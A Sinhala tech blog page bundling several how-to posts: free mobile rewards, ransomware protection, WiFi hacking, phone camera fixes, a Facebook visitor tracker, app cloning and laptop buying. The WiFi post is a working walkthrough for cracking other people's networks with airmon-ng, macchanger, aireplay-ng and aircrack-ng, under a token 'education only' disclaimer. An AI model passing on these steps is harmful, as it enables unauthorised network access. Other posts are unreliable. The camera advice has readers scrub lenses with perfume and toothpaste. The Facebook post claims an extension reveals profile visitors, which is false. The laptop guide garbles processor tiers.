ශ්‍රී ලාංකීය වෙබ් කලාවේ නවතම පෙරලිය

Showing posts with label Turorial. Show all posts
Image result for Dialog Freezone
මේකට ගිහින් කරන්න තියෙන්නේ බොහොම පොඩි දේවල්. Facebook Like කරන, Youtube Videos බලන වගේ බොහොම සුළු දේවල්. හැබැයි එකට ඔයාට නොමිලේ Reload, SMS, DATA  ලබා ගන්න පුළුවන්.
කිසි දිනුම් ඇදීමක් නෑ. හැමෝටම ගන්න පුළුවන්. හැබැයි කාලෙන් කාලෙට නොමිලේ දෙන දේවල් වෙනස් වෙනවා. රුපියල් 50ක් දක්වා reload දුන් අවස්ථාත් තියනවා
මුලින්ම මේකයි කරන්න තියෙන්නෙ. 

මුලින්ම පල්ලෙහා link එකේ තියන site එකට යන්න.


https://freezone.lk/



කළුපාටින් රවුම් කරල තියෙන තැන Login කියල තියෙන්නෙ ඒතන ක්ලික් කරන්න,
ඊට පස්සේ ඔබේ ඩයලොග් දුරකථන අංකය දීලා Log වෙන්න

 එතකොට Phone එකට SMS  එකක් එයි. ඒක Yes  කරාම auto website එකට log වෙනවා.



හරි දැන් කරන්න තියෙන්නෙ, මේකේ මේ වගේ තියෙන ලින්ක් වලට ගිහිල්ල ඒකෙ තියෙන දේ කරන්න. පොඩි පොඩි වැඩ තියෙන්නෙ. FB Like, Share, වගේ පොඩි පොඩි වැඩ කරන්න තියෙන්නෙ. 


මේ වගේ තියෙන Deal




මේ තියෙන්නෙ මට හම්බුන එකක්.



තවත් මේ වගේ පෝස්ට් එකකින් හම්බෙමු...


සයිබර් ඇටෑක් වලින් ආරක්‍ෂා වෙන්න හොඳම ක්‍රමයක් තමා &linux*
මේ දවස් වල කට්ටියගෙ අවධානය ඉතිං Ransomware එක ගැනනෙ.මේකෙන් ලංකාවට උන හානිය ගොඩක් අඩුයිනෙ. නැති තරම්. තාම එකක්වත් වාර්තා වෙලා නෑ මං හිතන්නෙ. හුගක් අය භාවිතා කරන්නෙ windows හොර copy (Cracked Version) නිසා ඉතිං Update එක ගැන ඉතිං මොන කතාද නේද? මගෙ බ්ලොග් එකේනං තියනව windows 10 version එක Update කරන්න පුලුවන් එක,
හරි හරි දැං උන දේ උනානෙ කොහොම හරි කමක් නෑ ඊලගට වෙන්න තියෙන දේ වලක්ව ගන්න පුලුවන්නං ලොකු දෙයක්නෙ. මම කියන්නෙ නෑ ආයෙ මේ වගෙ Attack එකක් ලෝකෙට එයි කියල ඒත් බැරි වෙලා හරි ආවොත්ඉතිං මොනා කරන්නද නේද. තමන්ගෙ ආරක්ෂාව තමන් සතුයි කියනවනෙ ඉතිං.
මේකට ක්‍රම ගොඩක් තියෙනව.

  1. 1.Original Windows පාවිච්චි කිරීම
  2.  හොඳ Virus Guard එකක් පාවිච්චි කිරීම
  3. Linux OS එකක් පාවිච්චි කිරීම.
  4.  තමන්ගෙ Data Backup කර තබා ගැනීම.


මේ වගේ තව ගොඩක් ක්‍රම තියෙනව අපිට මේ වගෙ දෙයක් උනොත් බේරෙන්න පුලුවන් ක්‍රම. හරි අපි බලමු මේව කොහොමද කරන්නෙ සහ මේවගෙන් මොකද වෙන්නෙ කියල,

1.  Original Windows පාවිච්චි කිරීම

මේකෙදි වෙන්නෙ අපි දැනගන්න කලින් මුලින්ම Microsoft ආයතනය ( තමන්ගෙ OS එකට අදාල ආයතනය) මේ ගැන දැනගන්නව. එයාල තමන්ගෙ customer ලව මේ කරදරයෙන් බේර ගන්න ඉක්මනටම Solution එකක් දෙනව. නැත්තං එයාල හදල තියෙන OS එක මේ වගෙ දේකට ඔරොත්තු දෙන්න වගේම මේ වගෙ ඒවගෙන් බේරෙන්න හදල තියෙන්න පුලුවන්. ඉතිං මේ වගෙ Attack එකක් ආවොත් Original Windows පාවිච්චි කරන අයට ඉක්මනින්ම Update එක ඇවිල්ල ඔයාව ඒ කරදරෙන් මුදව ගන්නව.  ඒ වගේම තමයි අපි windows crack කලාම වෙන්නෙ ගොඩක් දුරට Windows server එකට direct connect වෙන එක නවත්තන එක. ඉතිං ඒ පරිගණක වලින් internet ගිහිල්ල ඔයා ඒ ගැන දැනුවත් උනාට පරිගණකය ඒ ගැන දන්නෙ නෑ. ඒම උනාම ඉතිං බඩුම තමා. මේකට ඉතිං සල්ලි දීල Windows ගන්න ඕනම නෑ. වෙන ක්‍රම තියනව පස්සෙ ඒ ගැන කියා දෙන්නම්.

2. හොද Virus Guard එකක් පාවිච්චි කිරීම

මේකෙන් වෙන්නෙ ඔයාගෙ පරිගණකයෙ තියෙන Windows හොර copy එකක් උනත් ඔයාගෙ virus guard එක ඔර්ජිනල් නම්. නැත්තං නිතරම Updates එනවනම් කිසි දෙයක් ගැන බය වෙන්න දෙයක් නෑ මොන ඇටෑක් එක ආවත් ඔයාගෙ වයිරස් ගාඩ් එක සූදානම්. ඔය පුංචි පුංචි වයිරස් ගාඩ් ගැන නෙමෙයි මම කියන්නෙ හොදද ටිකක් හොද මට්ටමේ ඒව ගැන.

3.  Linux OS එකක් පාවිච්චි කිරීම.

මේ වගේ සයිබර් ඇටැක් වෙන්න පළවෙනි හේතුව තමා කම්පුයුටරේ අප්ඩේට් (Update) නොමැතිකම මන්ද මිනිස්සු සාමාන්‍ය‘යෙන් %OS^ එක අප්ඩේට් කරන්නෙ නැහැ. අපේ රට ගත්තම ගොඩක් තියෙන්නෙ හොර software බව ලෝක වාණිජ මෘදුකාංග සංගමය කළ සමීක්‍ෂණ වලින් සොයා ගෙන තිබෙනවා. ඊට අනුව අපි ඉන්නෙ ආසියානු පැසිෆික් කලාපයේ හතරවෙනි තැනයි.
උදාහරණයක් ලෙස 2015 වසරේ අපේ රටේ හොර software  පාවිච්චි කරන ගණන 79෴ ක් පමණ වෙනවා එවිට අපේ windows operating system එක  crack  කරපු එකක් නම් බොහෝ විට එය අපි update කරන්නෙ නැහැනෙ. මොකද update කරන්න ගියොත් crack  ටික හසු වෙන නිසා. ඒ නිසා අපි update  කරන එක off  කරනවා. එතකොට wanacryptor 2.0 වගේ ඇටෑක් එකට හරියන update එකක් Microsoft වල එවලා තියෙනවා නමුත් මිනිස්සු update කර ගෙන නැහැ. ඒකට ප්‍රධාන හේතුව තමා හොර software භාවිතා කරීම.
මේ වගේ ඇටක් වලින් බේරෙන්න විවිධාකාර ක්‍රම තිබෙනවා. එහෙම දෙයක් තමා Linux  කියන operating system එක Linux  පාවිචි කිරීමේ වාසිය තමා මෙය අපි ලැබෙන්නෙ නොමිලේ. උදාහරණයක් විදිහට අපි windows  8 ගන්න යනවා කියලා හිතමු. එතනදී අපි ඩොලර් 120 ක්, ඩොලර් 150 ක් ගෙවන්න ඕනෙ ලයිසන් කොපි එකක් ගන්න නම්, නමුත් Linux  අපිට හම්බ වෙන්නෙ නොමිලේ. එතකොට එකත් සමඟ අපිට හැමදාම updates  ලැබෙනවා. අපි හැමවෙලේම  update  කරලා තියෙනවා නම් මේ වගේ ඇටෑක් වලින් ප්‍රශ්නයක් වෙන්න නැහැ.
Linux  වලදී ඔරිජිනල් software  එක පාවිච් කරා නම් මේ ප්‍රශ්නෙ ඇති වෙන්නෙ නැහැ. ඒ ඕන කරන updates  ඒ හරහා එවන නිසා.
මේ OS  එකේ දෙවෙනි වාසිය තමා මෙය  internet  එකෙන් download  කර ගන්න ඔරිජිනල්  OS  එක Crack කිරීම් කිසි දෙයක් අවශ්‍ය නැහැ. මේ වගේ ඇටෑක් වලින් ආරක්‍ෂා වෙන්න හොඳ ක්‍රමයක් ලෙස  Linux හඳුන්වන්න පුළුවන්.
4.  තමන්ගෙ Data Backup කර තබා ගැනීම.
මේකනම් ඉතිං බේරෙන්න ක්‍රමයක් නෙමෙයි උනත් කලින් කියපු එකක්වත් තමන් ලග නැතිනම් කරන්න තියන අන්තිම ක්‍රමය තමා මේක. ඔයාගෙ අත්‍යවශ්‍ය Data backup කරල තියාගන්න එක තමා ඉතිං. මේකට අපේ අය කරන්නෙ DVD , Pen Drive වගේ දේවල් පාවිච්චි කරන එකනෙ. එහෙම කලා කියල Pen Drive එක නැති වුනොත් මොකද කරන්නෙ, DVD එක සීරුනොත් මොකද කරන්නෙ. ආයෙ තිබ්බ පොටෝස් එහෙම ගන්නයෑ නැද්ද හා, මේකට හොද ක්‍රමයක් වගේම සුරක්ෂිත ක්‍රමයක් තියෙනව. ඒ තමයි Cloud Storage සමහර අයනං දන්නවත් ඇති. මේක අපිට ගොඩක්ම නොමිලයේ ලබාදෙන සර්විස් එකක් නිසා අපිට නොමිලයේම වගේම සුරක්ෂිතව තියාගන්න පුලුවන්. මේ සේවාව ලබාදෙන ආයතන ගොඩක් තියෙනව. ඒ තමා
Google
OneDrive
Media Fire
MEGA
pCLOUD
Droup box
Box
Flip Drive
තව සෑහෙන්න තියෙනව. මේවගෙ අපිට නොමිලයේ දෙන්නෙ Service එක.  නිකං හම්බෙන Cloud Storage එක අපේ අය පාවිච්චි කරන්නෙ නෑ. ගූගල් එකට හම්බෙනව 15GB Free Cloud Storage එකක්. මේවගෙ Register Link මේ එක්ක දාල තියෙන්නෙ. ඒවත් පාවිච්චි කරන්න.

එහෙනං මං කැපුන. තව මේ වගේම වැදගත් පෝස්ට් එකකින් හම්බෙමු.


ගොඩක් අයට තියන කරදරයක් තමයි Deta කැපෙන කැපිල්ලට internet එකත් එක්කම එපා වෙන එක. මොනා කරන්නද ඉතිං Dialog පාවිච්චි කරන අයනම් මේක සුපිරියටම අත්විදිනවනේ. කොහොමද වෙනස සැපද? Deta Card එක මේ දානව මේ නෑ නේද? මොනා කරන්නද පුතා ලබා උපන් හැටි තමා මේ.... හරි හරි ඕකට විසදුමක් තමා මං ගෙනාවෙ. Town වල ඉන්න අයටනම් මේක ඉතිං සෑහෙන්න වටිනව.ගමේ කියල වෙනසක් නෑ ඉතිං හැමතැනම වගේ දැං wifi තියනවනෙ. අද මං ගෙනාවෙ ඔයාල හැමතැනම හොයන වගේම ගොඩක් අය අහුවෙලා තියන දෙයක්

Wifi Hacking
කට්ටිය ගොඩක් දෙනා මේ ගැන උනන්දුයිනෙ. ගොඩක් කට්ටිය මගෙන් ඇහුව ඇත්තටම මේ wifi hack කරන්න පුලුවන්ද කියල, අද අපි බලමු කොහොමද මේක කරන්නෙ කියල.
බොරු ප්‍රෝඩා නෑ මාත් කරන විදිහම තමා මේ. 100෴ වැඩ කරනවා ඒ ගැන බයවෙන්න එපා.
Automated application එකක්නම් නෙමෙයි මචං මේක. අපි විසිම්ම කරන දෙයක්. කට්ටිය ගොඩක් Automated application වලට අහුවෙනවනේ .
දැං බලමු කරන විදිහ.
මේකට ටිකක් deta ඕන මොකද ටිකක් ලොකු files download කරන්න තියනවා.
5Gb විතර තියාගෙන වැඩේට බහින එක හොදයි නැත්තම් මගදි deta ඉවර වුනොත්
හරි මුලින්ම මේ ටික ඕන කරනව මේ වැඩේට.

Compatible Wireless Adapter

Linax BackTrack 5r3 DVD

password list

Virtual Matchine

WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.
BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.

Virtual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි මචංල දැං ඕන  ටික Download කරගත්තනෙ එහෙනම්. දැං තියෙන්නෙ සුභ මොහොතින් වැඩේට බහින එක තමා,
දැං ඔයාලයට කරන්න තියෙන්න virtual box එකෙන් Linax BackTrack 5r3 Os එක run කරගන්න.
දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා.
airmon-ng



මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම හොඳේ.
දැන් මේ විදානය දෙන්න.

airmon-ng stop ra0



මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down



දැන් මේ විදානය දෙන්න.

macchanger --mac 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.
airmon-ng start ra0


මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.

airodump-ng ra0


මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0


මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න.

දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0


දැන් මේ විදානය දෙන්න.

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.

aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)


ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න WiFi නෙට්වර්ක් එකේ Pass Key එක ලබා ගන්න. ඒකට පහල විදානය දෙන්න. මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ.

aircrack-ng crackwpa-01.cap –w list




ඔන්න KEY එක හොයා ගත්ත. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න.

සැ.යු. මෙය නීති විරෝධී කටයුත්තක් බැවින්  කිසිම දේකට වගකියනු නොලබේ. අධ්‍යාපනය සඳහා පමණක් භාවිතා කරන්න කියල ඉල්ලා සිටිනව.










ගොඩක් අයට තියන ගැටලුවක් තමයි පෝන් එකක් අරන් ටිකක් කාලයක් යනකොට කැමරාව කොලිට් අඩු වෙන එක. කට්ටියනම් හිතන්නෙ කැමරාව සවුත්තු වෙනව කියල. හැබැයි එහෙම වෙන අවස්ථාත් තියනව 1% වගේ ඒවටනම් ඉතිං කොහොමත් කැමරාව රිප්ලේස් කරන්න වෙනව. නැතුව හරියන් නෑ.
මම අද කියන්නෙ කැමරාවෙ කොලිටිය අඩුවුන නමුත් කැමරාව සවුත්තු නොවුනු එකට විසදුමක්

ඔයගොල්ලොන්ගෙ පෝන් එකේ ගන්න පොටෝස් පැහැදිලි නැද්ද ? නිකන් ලාවට බොද වෙලා වගේද ? zoom කලාම ඩීටේල්ස් අඩුද මෙන්න මේ වගේ.




එහෙනම් මෙන්න මේ විදිහට කරල බලන්න.

හොදට බලන්න යගොල්ලොන්ගෙ පෝන් එකේ කැම් එකේ වීදුරුව දිහා .. හොදට බලන්න .. හොදට හරව හරව බලන්න .. බලන්න ඔයගොල්ලොන්ගෙ කැම් එකේ වීදුරුවත් මේ විදිහද කියල ... පොඩ්ඩක් හරි තියනව නේද? නැද්ද හොදට බලන්න මේක ලේසියෙන්නම් පේන්නෙ නෑ. පොඩ්ඩක් ලයිට් එකක් ගාවට ගිහිල්ල පෝන් එක දෙපැත්තට කර කර බලන්න. තියනව නේද බඩු?තියනව නම් පුතා ඔයාගෙ කැම් එකේ කොලිටි එක ටිකක් අවුල් වගේ තමයි ..


මෙන්න මේ වගේ....
හරි මන් කියල දෙන්නම් ඕක හදා ගන්නෙ කොහොමද ? , ඇත්තටම ඔය මොකක්ද වෙලා තියෙන්නෙ කියල..

ඔය හීරිලා වගේ තියෙන්නෙ වීදුරුව නෙමෙයි ..  ඔය තියෙන්නෙ UV Filter එකක් .. තවත් විදිහකට කිව්වොත් Oleo phobic coating එකක් ... 
ඕක ගහන්නෙ කැම් එකේ ලෙන්ස් එකේ කල් පැවැත්ම වැඩි වෙන්න .. මොකද එතකොට අහිත කර හිරු කිරන ඇවිල්ල කැම් එක සවුත්තු වෙන්නෙ නැ ඉක්මනට ... හැබයි අවාසනාවට ඒක යනව ගොඩක් පෝන් වල ඉක්මනට .. ඒක ඉතින් එක එක්කෙනා යූස් කරනව් ඉදිහට තමයි ... ඒක ගියත් යන්නෙ සම්පූර්නයෙන්ම නෙමෙයි නිකන් කෑලි කෑලි .. ඒ කියන්නෙ ඇත්තටම ඒ ෆිල්ටෙර් එක තමයි හීරෙන්නෙ ...  කැමරාවෙ වීදුරුවට උඩින් තමා ඕක ගහල එවන්නෙ .. ඒක හීරුනාම අපිට පැහැදිලි පොටෝස් ගන්න ලැබෙන්නෙ නැ ... ඉතින් අපිට පැහැදිලි පොටෝස් ආයෙ ගන්න ඕනෙ නම් ඒක සම්පූර්නයෙන්ම යවන්න ඕනෙ .. ඉතින් මන් කියල දෙන්නම් දැන් ඒක යවන්නෙ කොහොමද කියල 
මේක හරියටම බලාගන්න ඕන අය යවන්න කලින් පොටෝ එකක් අරගෙන ඉන්න. නැත්තම් මට රෙදි උස්සන් එයි කට්ටිය.
හරි දැන් වැඩේට බහිමු.

අවශ්‍ය ද්‍රව්‍ය- 
        * හොදින් තෙතමනය උරා ගන්න රෙදි කෑල්ලක්
        * පුලුන් කෑලි ටිකක්
        * ඕඩි කොලෝන් හරි සෙන්ට්  හරි බෝතලයක් ... ( හිස් බෝතල් උස්සන් එනව නෙමෙයි )

        * ටූත් පේස්ට් ටිකක්
(අත් සෝදගෙන වැඩේට බැස්සොත්නම් හොදයි නැත්තම් වැඩේ 100% හරියන් නෑ)

හරි එහෙනම් , මුලින්ම කැමරාවට සෙන්ට් ටිකක් ගහල  රෙදි කෑල්ලෙන් පිහදා ගන්න .. බය නැතුව ගහන්න හොදට සෙන්ට් .. ඇතුලට යන්නෙ නැ . බය නැතුව අතුල්ලන්න හරි අයිය හරි තව හයියෙන් තව හයියෙන් අතුල්ලන්න ☺☺☺☺
දැන් ආයෙ ගහන්න සෙන්ට් ටිකක් හොදට .. පිරිසිදු ඇගිල්ලින් පොඩ්ඩක් තද කරල (පොඩ්ඩක් හොදේ ) හොදට පිරිමදින්න කැම් එකේ ලෙන්ස් එක
විනාඩි දෙකක් විතර එක දිගට මදින්න .. ඊට පස්සෙ අර තෙත ගතිය වේලෙන්න තියන්න කැම් එකේ ලෙන්ස් එක පිහ දාන්නෙ නැතුව් ... වේලුනාට පස්සෙ පුලුන් කෑල්ලකින් එක පාර පිහදාල අරින්න ..
ඔහොම කරල බලන්න .. සමහරවිට ඕක එක පාරෙන් කරාට යන්නෙ නෑ .. ඔයාට ගොඩ පාරක් කරන්න වෙයි ඒ හීරිච්ච ගතිය යවන්න .. 10 පාරක් 15 පාරක් ඕකම කරල බලන්න .. පොඩ්ඩ පොඩ්ඩ තමා යන්නෙ .. ඒත් එහෙම කරලත් ගියෙ නැත්තම් ඊලග ස්ටෙප් එකට යමු .. ඒකෙන් කලොත් නම් අනිව යනවම තමයි ..


ගන්න ටූත් පේස්ට් ටිකක් ඇගිල්ලට ... දැන් අර කලින් වගේම ඒ ටික කැමරාවෙ වීදුරුවට දාල පොඩ්ඩක් තද කරල හොදට මදින්න .. ඒක එච්චර වෙලා මදින්න එපා තත්පර 30 ක්  45ක් මදින්න .. ඊට පස්සෙ පුලුන් කෑල්ලක් අරන් ඒ ටික පිහදාන්න .. දැන් බලන්න් ගියාද කියල .. එක පාරින් නම් යන එකක් නෑ .. ටික ටික තමා යන්නෙ .. කොහොම හරි යනකන්ම එහෙම කරන්න .. දානව , මදිනව , පිහදානව .. ඔන්න ඔය විදිහට 
☺☺☺
ගියාට පස්සෙ ආයෙත් සෙන්ට් ටිකක් හොදට ගහල අර රෙදි කෑල්ලෙන් පිහදාන්න ..
ඊට පස්සෙ තව වැඩක් තියනව .. අර සෙන්ට් එකේ ටූත් පේස්ට් වල තෙල් ගතිය වීදුරුවෙ තියන නිසා ටිකක් අවුල් .. ඒක නිසා . සබන් පොඩ්ඩක් අගිල්ලෙ ගාගෙන ඒ ටික වීදුරුවට දාල හොදට පිරිමදින්න ... ඉට පස්සෙ අගිල්ල වතුරෙන් තෙත් කරගෙන වීදුරුව පිහ දාන්න සබන් ටික යනකන් .. ඊට පස්සෙ ආයෙත් අර රෙදි කෑල්ලෙන් වතුර ගතිය යන්න පිහ දාන්න ..
දැන් පෝන් එක එලිය තියන තැනකට අරන් ගිහිල්ල ලෙන්ස් එක දිහා බලන්න දැන්.
තියනව නේද දිලිසි දිලිසි

හම්මේ ඉතිං මූනෙ තියන හිනාව....


හරි දැන් එහෙනම් කලින් ගත්ත තැනම පොටෝ එකක් ගන්න ආයෙ. අරගෙන බලන්න කොහොමද වෙනස කියල?
මේ විදිහට හරි ගියෙ නැත්තම් ඉතිං කැමරාව මාරු කරන්න වෙනව.







එහෙනම් අපි කැපුන
Share පාරක් දාල අපිටත් සප් එකක් දෙන්න
ගොඩක් අයට තියන ප්‍රශ්නයක් තමා කෝච්චියෙ යන්න ගියාම කෝච්චිය තියන වෙලාව දන්නෙ නැතුව ගිහිල්ල රස්තියාදු වෙන එක
ඒකට ඉතිං හොදම පිලියමක් මං ගෙනාව , දැං ඉතිං රස්තියාදු වුන කාලෙ ඉවරයි, ගෙදර ඉදන් වෙලාවටම යන්න පුලුවන්,හරි මේකයි කරන්න තියෙන්නෙ
මේ ලින්ක් එකට ගිහිල්ල මේ ඇප් එක බා⁣ගන්න තියෙන්නෙ ඔයාට ඕන station එකක් දීල බහින station එකත් දීල තියන සේරම කෝච්චි බලන්න පුලුවන්


සමහර කෙල්ලො කොල්ලො ඉන්නවනෙ හිතිං ආදරේ කරන අය. මොකද කිව්වොත් ආදරේ ප්‍රකාශ කරන්න
බය තියන අය, එහමෙ කනෙක් අපි ගැනත් සැලකිලිමත් වෙනවද කියල අපිට දැනගන්න බෑනෙ නේද? මොකද අපිට අනුන්ගෙ හිත් කියවන්න බෑනෙ. අද මං ගෙනාව  ඔයාලට නොකියම ඔයාගෙ facebook Profile එක ගැන සැලකිලිමත් වෙන අය හොයාගන්න ක්‍රමයක්, ඔයාටත් නොකියම ඔයාගෙ facebook Profile එකට ඇවිල්ල යන අය මේකෙන් බලාගන්න පුලුවන්.
හරි අපි බලමු මේක අපි කොහොමද කරන්නෙ කියල,
මේක කරන්න ක්‍රම දෙකක් තියනව. ලේසිම විදිහ කියල දෙන්නම්, අනිත් ක්‍රමයත් ඕනනම් comment  එකක් දාන්න.
හැබැයි මුලින්ම කියන්න ඕන මේක පෝන් එකෙන් කරන්න ඕනනම් google chrome එක තියෙන්න ඕන.
මුලින්ම ඔයාගෙ ක්‍රෝම් බ්‍රව්සර් එක ඕපන් කරගන්න.

දැං මෙන්න මේ ලින්ක් එකට ගිහිල්ල තියන Extention එක දාගන්න.

හරි දැන්  ක්‍රෝම් බ්‍රවුසර් එක ක්ලෝස් කරල ආපහු ඕපන් කරගන්න,

දැං ඔයාලගෙ facebook ගිනුමට ලොග්වෙන්න, ඊට පස්සෙ ඔයාගෙ facebook Profile එකේ පෙන්නනව Visitors කියල button එකක්


click කරාම popup මැසේජ් එකක් එනව ඔයාගෙ facebook Profile එක බැලුව අයගෙ facebook Profile එක එක්කම.


ඔන්න වැඩේ හරිනෙ එහෙනම් අපි කැපුන.

ශෙයා පාරක් දාල අපිටත් සප් එකක් දෙන්න,

ගොඩක් දෙනෙක්ට තියෙන ප්‍රශ්නයක් තමා Fb app එකෙන් එකවුන්ට් දෙකකට එකපාර යන්න බැයිද කියන එක, එ් වගෙම තමා Viber,whtsapp,imo මේවගෙන් තව නම්බර් එකකින් තව එකවුන්ට් එකක් එකම පෝන් එකට හදන්න බැයිද කියන එක,  fb එකටනං ගොඩක් අය facebook lite ඇප් එක තියාගෙන එකවුන්ට් දෙකක් පාවිච්චි කරනව. නමුත් lite ඇප් එකේ ඔරිජිනල් ඇප් එක තරම් features නෑනෙ.
අද මං ගෙනාවෙ මේකට හොදම විසදුමක්, එකම පෝන් එකෙන් එකවුන්ට් දෙකක් නෙමෙයි සීයක් වුනත් හදාගෙන පාවිච්චි කරන්න පුලුවන් වැඩක් තමා මේක, එක එක ඇප් දාන්න ඕන නෑ , තියන ඔරිජිනල් ඇප් එකෙන්ම වැඩේ කරන්න පුලුවන්



එහෙනම් අපි බලමු මේක කරන්නෙ කොහොමද කියල,
මුලින්ම් ඔයාල යන්නකො playstore එකට

හරි දැං search bar එකේ search කරන්න app cloner කියල,

මේ තියෙන්නෙ ඇප් එක. මේක බාගන්න ඔයාල,
හරි දැං බාගත්ත අය මේක Open කරගන්න,

Open කරගත්ත අයට මෙන්න මේ වගේ screen එකක් එයි. 




හරි දැං කට්ටියට එකවුන්ට් දෙකක් හදාගන්න ඕන ඇප් එක හොයාගන්න,
(උදාහරනෙකට ගත්තෙ Facebook එක)

දැං මේ විදිහෙ screen එකක් එයි ඔයාලට



හරි දැන් ඔයාලට මෙතනදි තමා ඔයාල හදාගන්න ඇප් එකේ විස්තර වෙනස් කරන්නෙ. කැමති නමක් දාගන්න, කැමති icon එකක් දාගන්න, ඕනම වෙනස්කමක් කරන්න පුළුවන් මෙතනදි. හැබැයි හදල ඉවර උනාට පස්සෙනම් ඉතිං බෑ වෙනස් කරන්න,
සැ.යු. අනිවාර්යෙන්ම නම වෙනස් කරගන්න නැත්තම් ඔයාට බැරිවෙයි ඇප් දෙක වෙනස් කරල අදුනගන්න,

හරි දැං ඔයාලට ඕන සේරම වෙනස්කම් ටික කරල ඉවර වුනාට පස්සෙ මේ හරිය ක්ලික් කරල ඇප් එක හදාගන්න.


දැං කරන්න තියෙන්නෙ ඉතිං ඇප් එක ඉන්ස්ටෝල් කරගෙන අනිත් එකවුන්ට් එකෙන් ලොග් වෙන්නයි,
එහෙනං අපි කැපුන,
ශෙයා කරල අපිටත් සප් එකක් දීලම යන්න
ගොඩක් අය මගෙන් අහන දෙයක් තමයි LAP එකක් ගන්නඉන්නෙ බං මොකක්ද හොදම ගන්න කියල, දැනට ලැපක් අරගෙන ඉන්න අයටනම් ඉතිං මේකෙන් වැඩක් නෑ තමයි. කමක් නෑ බං කියෝල දාහං  බං ඔන්න ඔහෙ....


හරි....දැන් සමහර කට්ටිය නම් තමන් ගන්න ඉන්න ලැප් එකේ   specification බලනවා. සමහර කට්ටියවිතරක් නෙමේ.....හැමෝම බලන්නේ ඒක තමා.
ඒ කියන්නේ ඔය
Processor,
RAM,
HDD,
VGA,
Sound,
Battery Life,
Screen Size 
වගේ ඒවා තමා මුලටම එන්නේ.

අපි දැං කතාකරමු මේව ගැන,
Processor

මේක තමා මුලටම එන්නේ. මේකෙන් තමා ගොඩක් වෙලාවට ලැප් වල ගණන් එහෙම වෙනස් වෙන්නේ. 
Intel Pentium 3, Intel Pentium 4, Intel Atom, Intel Dual Core, Intel Core 2 Duo, Intel Core 2 Quad, Intel Core i3, Intel Core i5, Intel Core i9, Intel Core i9

මේ මම දාල තියෙන්නේ මේවල වේගය වැඩි වෙන විදියට...අඩුම Intel Pentium 3 සහ දැනට වැඩිම වේගය තියෙන Intel Core i9 seven Generation Processor කියන විදියට. මේකෙන් ඕනෑම එකක් ඔයාලට ඔයාට වියදම් කරන්න පුළුවන් ගාන අනුව රදා පවතිනවා.

මෙතනින් අඩුම ගාන තියෙන්නේ Intel Pentium 3 එකට. වැඩිම ගාන තියෙන්නේ Intel Core i9 එකට. ඒ වගේ තමා මේවල Speed වල පැහැදිලි වෙනසක් තියෙන්නවා. මේකෙන් හොඳම ඒක තමා Intel Core i9 7th Generation Processor ඒක..

සාමාන්‍යයෙන් ඔය MS Office Package ඒක වගේ පාවිච්චි කරන කෙනෙකුටඉතින් ඔය Core i9 එකක් ගත්ත කියල තේරුමක් නැහැ. මොකද MS Office කරන කෙනෙකුට අඩුම Dual Core එකක් හොඳටම ප්‍රමාණවත්. අනික ගන්න මිලත් අඩුයි සල්ලිත් ඉතුරුයි. 

තව විශේෂ දෙයක්  තියෙනව මේ processor වල. එකට තමා Cache Memory කියල කියන්නේ. තව L1, L2, L3 කියල කියන්නෙත් ඔකටම තමා. මේකත් ගොඩක් වැදගත් ඔය ලැප් එකේ Speed ඒක ගැන වද වෙනවනම්. මේක තියෙන්නේ අදාල processor ඒක ඇතුලේ. මේකෙන් සැලකියයුතු වෙනසක් ලැප් එකට වෙනවා. Cache Memory එක වැඩි එක ටිකක් වේගවත් ඒ නිසා processor එක ටිකක් අඩු උනත් Cache Memory එක වැඩි එක තමා හොද. 
 
හරි දැන් Processor එක ගැන ටිකක් දැන ගත්තනේ අපි දැන් බලමු Processor  / CPU ඒක මොන වගේ වෙන්න ඕනද කියලා ගන්න ලැප් එකේ.

